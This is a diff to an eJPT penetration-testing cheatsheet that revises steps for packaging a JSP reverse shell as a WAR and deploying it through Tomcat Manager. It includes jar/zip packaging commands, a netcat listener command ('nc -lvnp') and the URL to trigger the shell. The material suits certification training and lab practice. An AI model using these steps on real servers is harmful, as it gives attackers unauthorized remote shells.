taof211/eJPT-Lab-Writeups/Cheatsheets/eJPT-Field-Manual.md

     - Orient: Deploy a WAR containing the JSP shell.
     - Decide: Package and deploy JSP shell.
     - Act:
-      1. Edit LHOST & LPORT in JSP.
+      1. Modify `jsp-reverse.jsp` with LHOST and LPORT.
+      2. Create a directory (e.g., `shell/`) and place the JSP inside it.
+      3. Package as WAR:
-      2. Place in `shell/` and package: `jar -cvf shell.war -C shell .` (or `zip -r shell.war shell/`).
+         - `jar -cvf shell.war -C shell .`
+         - or `zip -r shell.war shell/`
-      3. Deploy via Tomcat Manager.
+      4. Deploy `shell.war` via the Tomcat Manager console.
-      4. Start listener and open `http://<target_ip>/shell/jsp-reverse.jsp`.
+      5. Start a listener on Kali: `nc -lvnp <LPORT>`.
+      6. Open `http://<target_ip>/shell/jsp-reverse.jsp` to trigger the shell.

 #### Windows Binaries